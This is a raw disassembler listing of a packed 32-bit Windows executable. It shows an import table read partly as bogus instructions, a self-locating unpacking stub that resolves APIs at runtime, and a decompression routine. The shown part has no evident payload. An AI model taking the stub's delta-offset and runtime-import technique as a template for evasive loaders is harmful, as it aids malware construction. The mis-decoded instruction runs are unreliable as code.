dd 6F4C020Dh, 466C6163h, 656572h, 704F0230h, 754D6E65h
dd 41786574h, 0
dd 704F0232h
; ---------------------------------------------------------------------------
loc_448894: ; CODE XREF: .text:00448820�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_448908
arpl [ebp+73h], sp
jnb short $+2
; ---------------------------------------------------------------------------
dw 0
dd 6552025Ch, 69466461h, 656Ch, 74520278h, 776E556Ch, 646E69h
dd 74520279h, 72655A6Ch, 6D654D6Fh, 79726Fh, 72430042h
dd 65746165h, 656C6946h, 41h, 655302A8h, 6C694674h, 696F5065h
dd 7265746Eh, 0
dd 655302ACh, 6C694674h, 6D695465h, 65h, 6C5302DCh, 706565h
dd 655402E4h
; ---------------------------------------------------------------------------
loc_448908: ; CODE XREF: .text:00448897�j
jb short loc_448977
imul ebp, [esi+61h], 72506574h
outsd
arpl [ebp+73h], sp
jnb short $+2
add dh, bh
add dl, [esi+69h]
jb short near ptr word_448992
jnz short loc_448981
insb
inc ecx
insb
insb
outsd
arpl [eax], ax
; ---------------------------------------------------------------------------
db 0
db 0
db 3, 56h, 69h
aRtualfree db 'rtualFree',0
align 4
db 5
db 3, 56h, 69h
aRtualquery db 'rtualQuery',0
align 4
db 11h
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
align 10h
dd 69570312h, 6578456Eh, 63h, 7257031Dh, 46657469h
db 69h, 6Ch, 65h
; ---------------------------------------------------------------------------
loc_448977: ; CODE XREF: .text:loc_448908�j
add [edi+0], cl
inc ebx
jb short loc_4489E2
popa
jz short near ptr loc_4489E4+1
dec ebp
loc_448981: ; CODE XREF: .text:0044891E�j
jnz short loc_4489F7
db 65h
js short loc_4489C7
; ---------------------------------------------------------------------------
dw 0
dd 736C0345h, 656C7274h
db 6Eh, 41h
word_448992 dw 0 ; CODE XREF: .text:0044891C�j
dd 736C0346h, 656C7274h, 576Eh, 72430054h, 65746165h, 636F7250h
dd 41737365h, 0
dd 7243005Ah, 65746165h, 65726854h, 6461h
db 63h, 0, 43h
; ---------------------------------------------------------------------------
loc_4489C7: ; CODE XREF: .text:00448983�j
popa
insb
insb
push edi
imul ebp, [esi+64h], 7250776Fh
outsd
arpl [ecx+0], ax
; ---------------------------------------------------------------------------
dw 0
dd 6547006Ch, 6E695774h
db 64h, 6Fh
; ---------------------------------------------------------------------------
loc_4489E2: ; CODE XREF: .text:0044897B�j
ja short loc_448A38
loc_4489E4: ; CODE XREF: .text:0044897E�j
db 65h
js short loc_448A5B
inc ecx
; ---------------------------------------------------------------------------
dd 0
dd 65470073h, 6E695774h
db 64h, 6Fh, 77h
; ---------------------------------------------------------------------------
loc_4489F7: ; CODE XREF: .text:loc_448981�j
push edx
arpl gs:[eax+eax+78h], si
add [esi+69h], al
outsb
db 64h
push edi
imul ebp, [esi+64h], 41776Fh
; ---------------------------------------------------------------------------
dw 0
dd 6547007Ch, 6E695774h, 776F64h, 65470011h, 616C4374h
dd 614E7373h, 41656Dh, 655300CFh, 636F4674h, 7375h, 654700D4h
; ---------------------------------------------------------------------------
loc_448A38: ; CODE XREF: .text:loc_4489E2�j
jz short near ptr loc_448A7F+1
outsd
jb short loc_448AA2
db 67h
jb near ptr 8AAFh
jnz short loc_448AB0
db 64h
push edi
imul ebp, [esi+64h], 776Fh
add [ecx], bl
add [edi+ebp*2+61h], cl
db 64h
inc ebx
jnz short near ptr loc_448AC5+2
jnb short near ptr loc_448AC5+1
jb short loc_448A9A
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_448A5B: ; CODE XREF: .text:loc_4489E4�j
add [edx], cl
add [ebx+65h], edx
jz short loc_448AB6
imul ebp, [ebp+65h], 1B000072h
add [edi+ebp*2+61h], cl
db 64h
dec ecx
arpl [edi+6Eh], bp
inc ecx
add [eax+1], al
dec ebp
db 65h
jnb short loc_448AED
popa
db 67h, 65h
inc edx
outsd
loc_448A7F: ; CODE XREF: .text:loc_448A38�j
js short loc_448AC2
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 65470023h, 73654D74h, 65676173h, 41h, 65470169h
db 74h, 57h
; ---------------------------------------------------------------------------
loc_448A9A: ; CODE XREF: .text:00448A57�j
imul ebp, [esi+64h], 6F4C776Fh
outsb
loc_448AA2: ; CODE XREF: .text:00448A3B�j
db 67h
inc ecx
; ---------------------------------------------------------------------------
dd 0
dd 6553016Bh, 6E695774h
; ---------------------------------------------------------------------------
loc_448AB0: ; CODE XREF: .text:00448A40�j
outs dx, dword ptr fs:[esi]
ja short loc_448B00
outsd
outsb
loc_448AB6: ; CODE XREF: .text:00448A60�j
db 67h
inc ecx
; ---------------------------------------------------------------------------
dd 0
dd 7243016Eh
db 65h, 61h
; ---------------------------------------------------------------------------
loc_448AC2: ; CODE XREF: .text:loc_448A7F�j
jz short loc_448B29
inc esp
loc_448AC5: ; CODE XREF: .text:00448A55�j
; .text:00448A53�j
db 65h
jnb short loc_448B33
jz short near ptr loc_448B37+2
jo short near ptr loc_448B0C+1
; ---------------------------------------------------------------------------
dd 0
dd 65530175h, 72685474h, 44646165h, 746B7365h, 706Fh, 65470176h
dd 72685474h
db 65h
; ---------------------------------------------------------------------------
loc_448AED: ; CODE XREF: .text:00448A77�j
popa
db 64h
inc esp
db 65h
jnb short loc_448B5E
jz short near ptr loc_448B63+1
jo short $+2
add [edi], ah
add [edx+esi*2+61h], dl
outsb
jnb short loc_448B6C
loc_448B00: ; CODE XREF: .text:00448AB2�j
popa
jz short near ptr loc_448B67+1
dec ebp
db 65h
jnb short loc_448B7A
popa
add gs:[bx+si], al
loc_448B0C: ; CODE XREF: .text:00448ACA�j
sub [eax], al
inc esp
imul esi, [ebx+70h], 68637461h
dec ebp
db 65h
jnb short loc_448B8D
popa
db 67h, 65h
inc ecx
; ---------------------------------------------------------------------------
dw 0
dd 737701FBh, 6E697270h
db 74h
; ---------------------------------------------------------------------------
loc_448B29: ; CODE XREF: .text:loc_448AC2�j
inc cx
add [eax+eax], dh
push ebx
outs dx, byte ptr gs:[esi]
db 64h
dec ebp
loc_448B33: ; CODE XREF: .text:loc_448AC5�j
db 65h
jnb short loc_448BA9
popa
loc_448B37: ; CODE XREF: .text:00448AC8�j
db 67h, 65h
inc ecx
; ---------------------------------------------------------------------------
dw 0
dd 65520005h, 74736967h, 6C437265h, 41737361h, 0
dd 6F500041h, 75517473h, 654D7469h
; ---------------------------------------------------------------------------
jnb short loc_448BD1
loc_448B5E: ; CODE XREF: .text:00448AF0�j
popa
add gs:[bx+si], al
loc_448B63: ; CODE XREF: .text:00448AF3�j
add [edi+0], cl
push ebx
loc_448B67: ; CODE XREF: .text:00448B01�j
push 6957776Fh
loc_448B6C: ; CODE XREF: .text:00448AFE�j
outsb
outs dx, dword ptr fs:[esi]
ja short $+2
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 72430053h
db 65h, 61h
; ---------------------------------------------------------------------------
loc_448B7A: ; CODE XREF: .text:00448B04�j
jz short loc_448BE1
push edi
imul ebp, [esi+64h], 7845776Fh
inc ecx
; ---------------------------------------------------------------------------
db 3 dup(0)
; ---------------------------------------------------------------------------
push ebp
add [ebp+73h], al
loc_448B8D: ; CODE XREF: .text:00448B17�j
jz short near ptr loc_448BFF+2
outsd
jns short loc_448BE9
imul ebp, [esi+64h], 5A00776Fh
add [ebp+6Fh], cl
jbe short near ptr loc_448BFF+4
push edi
imul ebp, [esi+64h], 776Fh
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
popa
loc_448BA9: ; CODE XREF: .text:loc_448B33�j
add [ebp+66h], al
push edi
imul ebp, [esi+64h], 7250776Fh
outsd
arpl [ecx+0], ax
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 65470089h, 6F745374h, 624F6B63h, 7463656Ah, 0
db 0CAh
; ---------------------------------------------------------------------------
loc_448BD1: ; CODE XREF: .text:00448B5C�j
add [ebx+65h], dl
jz short loc_448C18
imul eax, [ebx+6Fh], 6Ch
outsd
jb short $+2
; ---------------------------------------------------------------------------
db 3 dup(0)
db 0DDh
; ---------------------------------------------------------------------------
loc_448BE1: ; CODE XREF: .text:loc_448B7A�j
add [ebx+65h], dl
jz short loc_448C3A
db 65h
js short loc_448C5D
loc_448BE9: ; CODE XREF: .text:00448B90�j
inc ebx
outsd
insb
outsd
jb short $+2
add dl, bh
add [ebx+72h], al
db 65h
popa
jz short loc_448C5D
inc edx
jb short loc_448C70
jnb short near ptr loc_448C63+2
dec ecx
outsb
loc_448BFF: ; CODE XREF: .text:loc_448B8D�j
; .text:00448B9C�j
imul esi, fs:[edx+65h], 7463h
add [eax+eax], bl
inc ebx
jb short loc_448C72
popa
jz short loc_448C75
inc esi
outsd
outsb
jz short near ptr word_448C56
; ---------------------------------------------------------------------------
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_448C18: ; CODE XREF: .text:00448BD4�j
sbb [eax], al
dec edi
jo short loc_448C82
outsb
push eax
jb short loc_448C90
arpl [ebp+73h], sp
jnb short near ptr loc_448C77+3
outsd
imul esp, [ebp+6Eh], 0
add [edx], bl
add [edi+65h], al
jz short near ptr loc_448C85+1
outsd
imul esp, [ebp+6Eh], 49h
outsb
outsw
loc_448C3A: ; CODE XREF: .text:00448BE4�j
jb short near ptr loc_448CA8+1
popa
jz short loc_448CA8
outsd
outsb
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 65520173h, 65724367h, 4B657461h, 78457965h
db 41h, 0
word_448C56 dw 0 ; CODE XREF: .text:00448C13�j
dd 65520176h
db 67h
; ---------------------------------------------------------------------------
loc_448C5D: ; CODE XREF: .text:00448BE6�j
; .text:00448BF6�j
inc ebx
insb
outsd
jnb short loc_448CC7
dec ebx
loc_448C63: ; CODE XREF: .text:00448BFB�j
db 65h
jns short $+3
; ---------------------------------------------------------------------------
dw 0
dd 6552017Bh, 65704F67h
; ---------------------------------------------------------------------------
loc_448C70: ; CODE XREF: .text:00448BF9�j
outsb
dec ebx
loc_448C72: ; CODE XREF: .text:00448C0B�j
db 65h
jns short loc_448CBA
loc_448C75: ; CODE XREF: .text:00448C0E�j
js short loc_448CB8
loc_448C77: ; CODE XREF: .text:00448C24�j
add [esi+67655201h], al
push ecx
jnz short loc_448CE5
jb short loc_448CFB
loc_448C82: ; CODE XREF: .text:00448C1B�j
push esi
popa
insb
loc_448C85: ; CODE XREF: .text:00448C30�j
jnz short near ptr loc_448CEA+2
inc ebp
js short near ptr loc_448CC9+2
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
xchg eax, edx
add [edx+65h], edx
loc_448C90: ; CODE XREF: .text:00448C1F�j
db 67h
push ebx
db 65h
jz short near ptr loc_448CEA+1
popa
insb
jnz short loc_448CFE
inc ebp
js short loc_448CDD
; ---------------------------------------------------------------------------
dd 0
db 0CCh
db 1, 47h, 65h
dd 63655374h
; ---------------------------------------------------------------------------
loc_448CA8: ; CODE XREF: .text:00448C3D�j
; .text:loc_448C3A�j
jnz short near ptr loc_448D16+6
imul esi, [ecx+edi*2+49h], 6F666Eh
; ---------------------------------------------------------------------------
dw 0
dd 655301CFh
; ---------------------------------------------------------------------------
loc_448CB8: ; CODE XREF: .text:loc_448C75�j
jz short near ptr byte_448D0D
loc_448CBA: ; CODE XREF: .text:loc_448C72�j
arpl gs:[ebp+72h], si
imul esi, [ecx+edi*2+49h], 6F666Eh
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_448CC7: ; CODE XREF: .text:00448C60�j
add dh, dl
loc_448CC9: ; CODE XREF: .text:00448C88�j
add [ebx+65h], edx
jz short loc_448D13
outsb
jz short loc_448D43
imul esp, [ebp+73h], 63416E49h
insb
inc ecx
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
dec edx
loc_448CDD: ; CODE XREF: .text:00448C9A�j
add [edi+65h], al
jz short loc_448D35
; ---------------------------------------------------------------------------
dw 6469h
; ---------------------------------------------------------------------------
dec ecx
loc_448CE5: ; CODE XREF: .text:00448C7E�j
db 64h
outs dx, byte ptr gs:[esi]
jz short near ptr loc_448D51+2
loc_448CEA: ; CODE XREF: .text:00448C92�j
; .text:loc_448C85�j
imul sp, [ebp+72h], 7541h
jz short near ptr loc_448D56+4
outsd
jb short near ptr loc_448D5D+1
jz short loc_448D70
add [ebx+0], cl
inc edi
loc_448CFB: ; CODE XREF: .text:00448C80�j
db 65h
jz short loc_448D51
loc_448CFE: ; CODE XREF: .text:00448C97�j
imul esp, [ebx+edx*2+75h], 74754162h
push 7469726Fh
jns short $+2
; ---------------------------------------------------------------------------
byte_448D0D db 3 dup(0) ; CODE XREF: .text:loc_448CB8�j
db 4Ch, 0, 47h
; ---------------------------------------------------------------------------
loc_448D13: ; CODE XREF: .text:00448CCC�j
db 65h
jz short near ptr loc_448D68+1
loc_448D16: ; CODE XREF: .text:loc_448CA8�j
imul esp, [ebx+edx*2+75h], 74754162h
push 7469726Fh
jns short loc_448D68
outsd
jnz short loc_448D96
jz short $+2
; ---------------------------------------------------------------------------
dw 0
dd 695F00E8h, 616F74h
db 18h
; ---------------------------------------------------------------------------
loc_448D35: ; CODE XREF: .text:00448CE0�j
add [edi+5Fh], bl
inc edi
db 65h
jz short loc_448D89
popa
; ---------------------------------------------------------------------------
db 69h, 6Eh, 41h
db 72h, 67h, 73h
; ---------------------------------------------------------------------------
loc_448D43: ; CODE XREF: .text:00448CCF�j
add [ecx+6C735F01h], al
db 65h, 65h
jo short $+4
; ---------------------------------------------------------------------------
db 3 dup(0)
; ---------------------------------------------------------------------------
cmpsb
loc_448D51: ; CODE XREF: .text:loc_448CFB�j
; .text:00448CE8�j
add [edi+73h], ebx
jz short near ptr dword_448DC8
loc_448D56: ; CODE XREF: .text:00448CF0�j
imul esp, [ebx+6Dh], 0F6000070h
loc_448D5D: ; CODE XREF: .text:00448CF3�j
add [ecx+62h], esp
jnb short $+2
; ---------------------------------------------------------------------------
dw 0
dd 7865020Ah
; ---------------------------------------------------------------------------
loc_448D68: ; CODE XREF: .text:00448D23�j
; .text:loc_448D13�j
imul esi, [eax+eax+0], 656D0253h
loc_448D70: ; CODE XREF: .text:00448CF5�j
insd
arpl [ebp+70h], bp
; ---------------------------------------------------------------------------
dd 0
dd 656D0254h, 7970636Dh, 0
dd 656D0256h
db 6Dh
; ---------------------------------------------------------------------------
loc_448D89: ; CODE XREF: .text:00448D39�j
jnb short loc_448DF0
jz short $+2
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 61720260h
db 69h, 73h
; ---------------------------------------------------------------------------
loc_448D96: ; CODE XREF: .text:00448D26�j
add gs:[ecx+2], ah
jb short near ptr byte_448DFD
outsb
add fs:[eax], al
push 2
jnb short loc_448E0D
outs dx, byte ptr [si]
popa
insb
; ---------------------------------------------------------------------------
dd 0
dd 7073026Dh, 746E6972h, 66h, 7273026Fh, 646E61h, 73730270h
dd 666E6163h
dword_448DC8 dd 0 dd 74730271h, 74616372h, 0
dd 74730272h, 72686372h, 0
dd 7473027Bh, 6D636E72h, 70h
; ---------------------------------------------------------------------------
loc_448DF0: ; CODE XREF: .text:loc_448D89�j
dec edi
dec esp
inc ebp
inc ecx
push ebp
push esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
; ---------------------------------------------------------------------------
db 0
byte_448DFD db 3 dup(0) ; CODE XREF: .text:00448D9A�j
dd offset off_448000
; ---------------------------------------------------------------------------
push edi
dec ecx
dec esi
dec ecx
dec esi
inc ebp
push esp
db 2Eh
inc esp
loc_448E0D: ; CODE XREF: .text:00448DA2�j
dec esp
dec esp
add [eax+eax*4], dl
inc esp
add [eax+eax*4], dl
inc esp
add [edi+6Ch], ch
xor esi, gs:[edx]
db 2Eh
inc esp
dec esp
dec esp
; ---------------------------------------------------------------------------
db 3 dup(0)
dd offset off_448028
dd offset off_448028
dd offset off_448028
dd offset off_448028
dd 4E52454Bh, 32334C45h, 6C6C642Eh, 0
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd 52455355h, 442E3233h, 4C4Ch, 1Dh dup(448050h), 33494447h
dd 4C442E32h, 4Ch, 5 dup(448064h), 41564441h, 32334950h
dd 4C4C442Eh, 0
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd 44545243h, 442E4C4Ch, 4C4Ch, 12h dup(44808Ch), 3EBh dup(0)
db 90h
; ---------------------------------------------------------------------------
pusha
call sub_44A577
jmp short loc_44A055
; ---------------------------------------------------------------------------
align 4
dd 0D9000000h, 4873h, 90DB8700h, 6 dup(0)
dd 4A00001h, 9B000000h, 9A000000h, 3951F000h, 39523800h
dd 4 dup(0)
db 0
; ---------------------------------------------------------------------------
loc_44A055: ; CODE XREF: .text:0044A007�j
mov ebx, 4439A4h
add ebx, ebp
sub ebx, [ebp+4439D5h]
cmp dword ptr [ebp+444804h], 0
mov [ebp+444804h], ebx
jnz loc_44A4DB
lea eax, [ebp+44480Ch]
push eax
call dword ptr [ebp+444918h]
mov [ebp+444808h], eax
mov edi, eax
lea ebx, [ebp+444819h]
push ebx
push eax
call dword ptr [ebp+444914h]
mov [ebp+4439E1h], eax
lea ebx, [ebp+444826h]
push ebx
push edi
call dword ptr [ebp+444914h]
mov [ebp+4439E5h], eax
lea eax, [ebp+443B72h]
jmp eax
; ---------------------------------------------------------------------------
align 10h
dd 40h, 2 dup(0)
dd 80000000h, 12190004h, 2 dup(0)
dd 10000000h, 0BC980000h, 0C0000000h, 0BBCC0003h, 80000000h
dd 10540004h, 36h dup(0)
dd 9D8B0000h, 443A66h, 0A74DB0Bh, 8587038Bh, 443A6Ah, 0B58D0389h
dd 443A82h, 0F003E83h, 11D84h, 82B58D00h, 6A00443Ah, 10006804h
dd 680000h, 6A000018h, 0E195FF00h, 89004439h, 4439DD85h
dd 4468B00h, 10E05h, 68046A00h, 1000h, 0FF006A50h, 4439E195h
dd 0D9858900h, 56004439h, 9D031E8Bh, 444804h, 39DDB5FFh
dd 76FF0044h, 0E8535004h, 339h, 39D4BD80h, 75000044h, 0D485FE5Ch
dd 8B004439h, 4BD033Eh, 0FF004448h, 0C307C637h, 78FD7FFh
dd 53565150h, 0E983C88Bh, 0D9B58B06h, 33004439h, 74C90BDBh
dd 0E83CAC2Ch, 0EB0A74h, 474E93Ch, 0EDEB4943h, 0EB068Bh
dd 75063E80h, 0C10024F3h, 0C32B18C0h, 0C3830689h, 4C68305h
dd 0EB05E983h, 595E5BD0h, 8BC88B58h, 4BD033Eh, 8B004448h
dd 4439D9B5h, 2F9C100h, 0C88BA5F3h, 0F303E183h, 685EA4h
dd 6A000080h, 0D9B5FF00h, 0FF004439h, 4439E595h, 8C68300h
dd 0F003E83h, 0FFFF2885h, 800068FFh, 6A0000h, 39DDB5FFh
dd 95FF0044h, 4439E5h, 3A669D8Bh, 0DB0B0044h, 38B0874h
dd 3A6A8587h, 958B0044h, 444804h, 3A62858Bh, 0D02B0044h
dd 0C28B7974h, 3310E8C1h, 6EB58BDBh, 300443Ah, 444804B5h
dd 3E8300h, 4E8B6174h, 8E98304h, 3E8BE9D1h, 4804BD03h
dd 0C6830044h, 1E8B6608h, 830CEBC1h, 0C7401FBh, 7402FB83h
dd 3FB8316h, 2CEB2074h, 811E8B66h, 0FFFE3h, 4016600h, 661DEB1Fh
dd 0E3811E8Bh, 0FFFh, 1F140166h, 8B660EEBh, 0FFE3811Eh
dd 100000Fh, 0EB1F14h, 0FF0E8366h, 0E202C683h, 8B9AEBB4h
dd 44480495h, 0ADB58B00h, 0B004439h, 31174F6h, 0C00BADF2h
dd 0C2030A74h, 0AD66F88Bh, 0F1EBAB66h, 3A72B58Bh, 958B0044h
dd 444804h, 468BF203h, 0FC0850Ch, 10A84h, 8BC20300h, 95FF50D8h
dd 444918h, 775C085h, 1C95FF53h, 89004449h, 4439B185h
dd 0B585C700h, 4439h, 8B000000h, 44480495h, 85068B00h
dd 8B0375C0h, 0C2031046h, 39B58503h, 188B0044h, 3107E8Bh
dd 0B5BD03FAh, 85004439h, 0A2840FDBh, 0F7000000h, 0C3h
dd 3047580h, 534343DAh, 0FFFFE381h, 0FF537FFFh, 4439B1B5h
dd 1495FF00h, 85004449h, 6F755BC0h, 0C3F7h, 19758000h
dd 0C468B57h, 48048503h, 53500044h, 487F858Dh, 57500044h
dd 99E9h, 0FFE38100h, 8B7FFFFFh, 44480885h, 0B1853900h
dd 75004439h, 0D38B5724h, 2E2C14Ah, 39B19D8Bh, 7B8B0044h
dd 3B7C8B3Ch, 3B5C0378h, 13048B1Ch, 39B18503h, 0EB5F0044h
dd 468B5716h, 485030Ch, 50004448h, 0D0858D53h, 50004448h
dd 894BEB57h, 0B5858307h, 4004439h, 0FFFF32E9h, 890689FFh
dd 46890C46h, 14C68310h, 4804958Bh, 0EBE90044h
db 0FEh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_44A4DB: ; CODE XREF: .text:0044A06F�j
mov eax, [ebp+443A76h]
push eax
add eax, [ebp+444804h]
pop ecx
or ecx, ecx
mov [ebp+443EA1h], eax
popa
jnz short loc_44A4FC
mov eax, 1
retn 0Ch
; ---------------------------------------------------------------------------
loc_44A4FC: ; CODE XREF: .text:0044A4F2�j
push offset start
retn
; ---------------------------------------------------------------------------
mov eax, [ebp+444808h]
lea ecx, [ebp+444841h]
push ecx
push eax
call dword ptr [ebp+444914h]
mov [ebp+4439EDh], eax
lea eax, [ebp+444851h]
push eax
call dword ptr [ebp+44491Ch]
mov [ebp+44484Dh], eax
lea ecx, [ebp+44485Ch]
push ecx
push eax
call dword ptr [ebp+444914h]
mov [ebp+4439F1h], eax
mov eax, [ebp+44484Dh]
lea ecx, [ebp+444868h]
push ecx
push eax
call dword ptr [ebp+444914h]
call eax
add esp, 10h
pop edi
push 30h
lea ebx, [ebp+444872h]
push ebx
push edi
push 0
call dword ptr [ebp+4439F1h]
push 0FFFFFFFFh
call dword ptr [ebp+4439EDh]
; =============== S U B R O U T I N E =======================================
sub_44A577 proc near ; CODE XREF: .text:0044A002�p
mov ebp, [esp+0]
sub ebp, 4439ABh
retn
sub_44A577 endp
; ---------------------------------------------------------------------------
mov eax, [esp+10h]
sub esp, 354h
lea ecx, [esp+4]
push eax
call sub_44A93D
mov ecx, [esp+35Ch]
mov edx, [esp+358h]
push ecx
push edx
lea ecx, [esp+0Ch]
call sub_44A9BB
test al, al
jnz short loc_44A5BC
or eax, 0FFFFFFFFh
add esp, 354h
retn
; ---------------------------------------------------------------------------
loc_44A5BC: ; CODE XREF: .text:0044A5B0�j
mov ecx, [esp+360h]
lea eax, [esp]
push eax
push ecx
lea ecx, [esp+0Ch]
call sub_44ABC0
test al, al
jnz short loc_44A5DF
or eax, 0FFFFFFFFh
add esp, 354h
retn
; ---------------------------------------------------------------------------
loc_44A5DF: ; CODE XREF: .text:0044A5D3�j
mov eax, [esp]
add esp, 354h
retn 10h
; ---------------------------------------------------------------------------
align 4
dd 4030201h, 8070605h, 100E0C0Ah, 201C1814h, 40383028h
dd 80706050h, 0E0C0A0h, 0
dd 1000000h, 2010101h, 3020202h, 4030303h, 5040404h, 50505h
dd 1000000h, 3020201h, 5040403h, 7060605h, 9080807h, 0B0A0A09h
dd 0D0C0C0Bh, 0F0E0E0Dh, 1110100Fh, 3 dup(11111111h), 12121211h
dd 12121212h
db 12h
; =============== S U B R O U T I N E =======================================
sub_44A65D proc near ; CODE XREF: sub_44AA1C+13�p
; sub_44AA1C+30�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
mov edx, ecx
push esi
mov ecx, 8
push edi
cmp [edx+4], ecx
jb short loc_44A6A1
push ebx
mov esi, 0FFFFFFF8h
loc_44A672: ; CODE XREF: sub_44A65D+41�j
mov eax, [edx]
mov bl, [eax]
inc eax
mov byte ptr [esp+10h+var_4], bl
mov [edx], eax
mov eax, [edx+8]
mov edi, [esp+10h+var_4]
shl eax, 8
and edi, 0FFh
or eax, edi
mov edi, [edx+4]
add edi, esi
mov [edx+8], eax
mov eax, edi
mov [edx+4], edi
cmp eax, ecx
jnb short loc_44A672
pop ebx
loc_44A6A1: ; CODE XREF: sub_44A65D+D�j
mov esi, [edx+4]
mov eax, [edx+8]
mov edi, [esp+0Ch+arg_0]
sub ecx, esi
shr eax, cl
mov ecx, 18h
sub ecx, edi
and eax, 0FFFFFFh
shr eax, cl
add esi, edi
pop edi
mov [edx+4], esi
pop esi
pop ecx
retn 4
sub_44A65D endp
; =============== S U B R O U T I N E =======================================
sub_44A6C8 proc near ; CODE XREF: sub_44A93D+3E�p
; sub_44A93D+4C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov edx, [esp+arg_4]
mov [ecx+84h], eax
mov [ecx+88h], edx
lea eax, [edx+eax*4]
mov [ecx+8Ch], eax
add eax, 100h
retn 8
sub_44A6C8 endp
; =============== S U B R O U T I N E =======================================
sub_44A6ED proc near ; CODE XREF: sub_44AA1C+4C�p
; sub_44AA1C+F7�p ...
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
arg_0 = dword ptr 4
sub esp, 98h
push ebx
push ebp
push esi
mov edx, ecx
push edi
mov ecx, 0Fh
mov ebp, [edx+84h]
xor eax, eax
lea edi, [esp+0A8h+var_7C]
xor esi, esi
rep stosd
mov edi, [esp+0A8h+arg_0]
cmp ebp, esi
mov [esp+0A8h+var_88], edx
jbe short loc_44A732
loc_44A71D: ; CODE XREF: sub_44A6ED+43�j
xor ecx, ecx
mov cl, [eax+edi]
mov ebx, [esp+ecx*4+0A8h+var_80]
lea ecx, [esp+ecx*4+0A8h+var_80]
inc ebx
inc eax
cmp eax, ebp
mov [ecx], ebx
jb short loc_44A71D
loc_44A732: ; CODE XREF: sub_44A6ED+2E�j
mov ecx, 17h
mov [esp+0A8h+var_80], esi
mov [edx+4], esi
mov [edx+44h], esi
mov [esp+0A8h+var_40], esi
xor edi, edi
mov [esp+0A8h+var_8C], esi
mov [esp+0A8h+var_98], 1
mov [esp+0A8h+var_90], ecx
lea ebp, [edx+8]
mov [esp+0A8h+var_94], esi
loc_44A75E: ; CODE XREF: sub_44A6ED+109�j
mov eax, [esp+esi+0A8h+var_7C]
shl eax, cl
add edi, eax
cmp edi, 1000000h
mov [esp+0A8h+var_84], edi
ja loc_44A804
mov eax, [esp+esi+0A8h+var_80]
mov [ebp+0], edi
mov ebx, [ebp+3Ch]
add eax, ebx
cmp ecx, 10h
mov [ebp+40h], eax
mov [esp+esi+0A8h+var_3C], eax
jl short loc_44A7DB
mov esi, [ebp+0]
mov eax, [esp+0A8h+var_98]
mov ebx, [esp+0A8h+var_8C]
mov edi, [edx+8Ch]
shr esi, 10h
mov ecx, esi
and eax, 0FFh
sub ecx, ebx
add edi, ebx
mov bl, al
mov edx, ecx
mov bh, bl
mov [esp+0A8h+var_8C], esi
mov eax, ebx
mov esi, [esp+0A8h+var_94]
shl eax, 10h
mov ax, bx
shr ecx, 2
rep stosd
mov ecx, edx
mov edx, [esp+0A8h+var_88]
and ecx, 3
rep stosb
mov edi, [esp+0A8h+var_84]
mov ecx, [esp+0A8h+var_90]
loc_44A7DB: ; CODE XREF: sub_44A6ED+9F�j
mov eax, [esp+0A8h+var_98]
add esi, 4
inc eax
dec ecx
add ebp, 4
cmp ecx, 9
mov [esp+0A8h+var_98], eax
mov [esp+0A8h+var_90], ecx
mov [esp+0A8h+var_94], esi
jge loc_44A75E
cmp edi, 1000000h
jz short loc_44A813
loc_44A804: ; CODE XREF: sub_44A6ED+83�j
pop edi
pop esi
pop ebp
xor al, al
pop ebx
add esp, 98h
retn 4
; ---------------------------------------------------------------------------
loc_44A813: ; CODE XREF: sub_44A6ED+115�j
mov eax, [edx+84h]
xor ecx, ecx
test eax, eax
jbe short loc_44A85A
mov esi, [esp+0A8h+arg_0]
loc_44A826: ; CODE XREF: sub_44A6ED+16B�j
mov al, [ecx+esi]
test al, al
jz short loc_44A84F
mov edi, [edx+88h]
and eax, 0FFh
mov eax, [esp+eax*4+0A8h+var_40]
mov [edi+eax*4], ecx
xor eax, eax
mov al, [ecx+esi]
mov edi, [esp+eax*4+0A8h+var_40]
lea eax, [esp+eax*4+0A8h+var_40]
inc edi
mov [eax], edi
loc_44A84F: ; CODE XREF: sub_44A6ED+13E�j
mov eax, [edx+84h]
inc ecx
cmp ecx, eax
jb short loc_44A826
